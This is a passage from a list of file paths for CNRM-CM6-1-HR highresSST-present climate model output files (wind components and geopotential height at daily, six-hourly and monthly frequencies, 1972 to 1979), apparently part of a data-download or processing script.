'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771101-19771130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750601-19750630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720401-19720430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771201-19771231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720501-19720531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750701-19750731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720701-19720731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750801-19750831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721001-19721031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750901-19750930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751001-19751031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721201-19721231.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751101-19751130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19730131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751201-19751231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730201-19730228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730301-19730331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730401-19730430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730501-19730531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730601-19730630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730701-19730731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730801-19730831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730901-19730930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731001-19731031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731101-19731130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731201-19731231.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197212312359.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197312312359.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19780131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780201-19780228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780301-19780331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780401-19780430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780501-19780531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780601-19780630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780701-19780731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780801-19780831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780901-19780930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781001-19781031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781101-19781130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781201-19781231.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19790131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790201-19790228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790301-19790331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790401-19790430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790501-19790531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790601-19790630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790701-19790731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790801-19790831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790901-19790930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791001-19791031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791101-19791130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791201-19791231.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197601312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197602010000-197602292359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197603010000-197603312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197604010000-197604302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197605010000-197605312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197606010000-197606302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197607010000-197607312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197608010000-197608312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197609010000-197609302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197610010000-197610312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197611010000-197611302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197612010000-197612312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197701312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197702010000-197702282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197703010000-197703312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197704010000-197704302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197705010000-197705312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197706010000-197706302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197707010000-197707312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197708010000-197708312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197709010000-197709302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197710010000-197710312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197711010000-197711302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197712010000-197712312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197401312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197402010000-197402282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197403010000-197403312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197404010000-197404302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197405010000-197405312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197406010000-197406302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197407010000-197407312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197408010000-197408312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197409010000-197409302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197410010000-197410312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197411010000-197411302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197412010000-197412312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197501312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197502010000-197502282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197503010000-197503312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197504010000-197504302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197505010000-197505312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197506010000-197506302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197507010000-197507312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197508010000-197508312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197509010000-197509302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197510010000-197510312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197511010000-197511302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197512010000-197512312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197801312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197802010000-197802282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197803010000-197803312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197804010000-197804302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197805010000-197805312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197806010000-197806302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197807010000-197807312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197808010000-197808312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197809010000-197809302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197810010000-197810312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197811010000-197811302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197812010000-197812312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197901312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197902010000-197902282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197903010000-197903312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197904010000-197904302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197905010000-197905312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197906010000-197906302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197907010000-197907312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197908010000-197908312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197909010000-197909302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197910010000-197910312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197911010000-197911302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197912010000-197912312359.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601-197612.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701-197712.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401-197412.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501-197512.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801-197812.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901-197912.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19760131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760201-19760229.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760301-19760331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760401-19760430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760501-19760531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760601-19760630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760701-19760731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760801-19760831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760901-19760930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761001-19761031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761101-19761130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761201-19761231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19770131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770201-19770228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770301-19770331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770401-19770430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770501-19770531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770601-19770630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770701-19770731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770801-19770831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770901-19770930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771001-19771031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771101-19771130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771201-19771231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19740131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740201-19740228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740301-19740331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740401-19740430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740501-19740531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740601-19740630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740701-19740731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740801-19740831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740901-19740930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741001-19741031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741101-19741130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741201-19741231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19750131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750201-19750228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750301-19750331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750401-19750430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750501-19750531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750601-19750630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750701-19750731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750801-19750831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750901-19750930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751001-19751031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751101-19751130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751201-19751231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19780131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780201-19780228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780301-19780331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780401-19780430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780501-19780531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780601-19780630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780701-19780731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780801-19780831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780901-19780930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781001-19781031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781101-19781130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781201-19781231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19790131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790201-19790228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790301-19790331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790401-19790430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790501-19790531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790601-19790630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790701-19790731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790801-19790831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790901-19790930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791001-19791031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791101-19791130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791201-19791231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19760131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760201-19760229.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760301-19760331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760401-19760430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760501-19760531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760601-19760630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760701-19760731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760801-19760831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760901-19760930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761001-19761031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761101-19761130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761201-19761231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19770131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770201-19770228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770301-19770331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770401-19770430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770501-19770531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770601-19770630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770701-19770731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770801-19770831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770901-19770930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771001-19771031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771101-19771130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771201-19771231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19760131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760201-19760229.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760301-19760331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760401-19760430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760501-19760531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760601-19760630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760701-19760731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760801-19760831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760901-19760930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761001-19761031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761101-19761130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761201-19761231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19770131.nc',
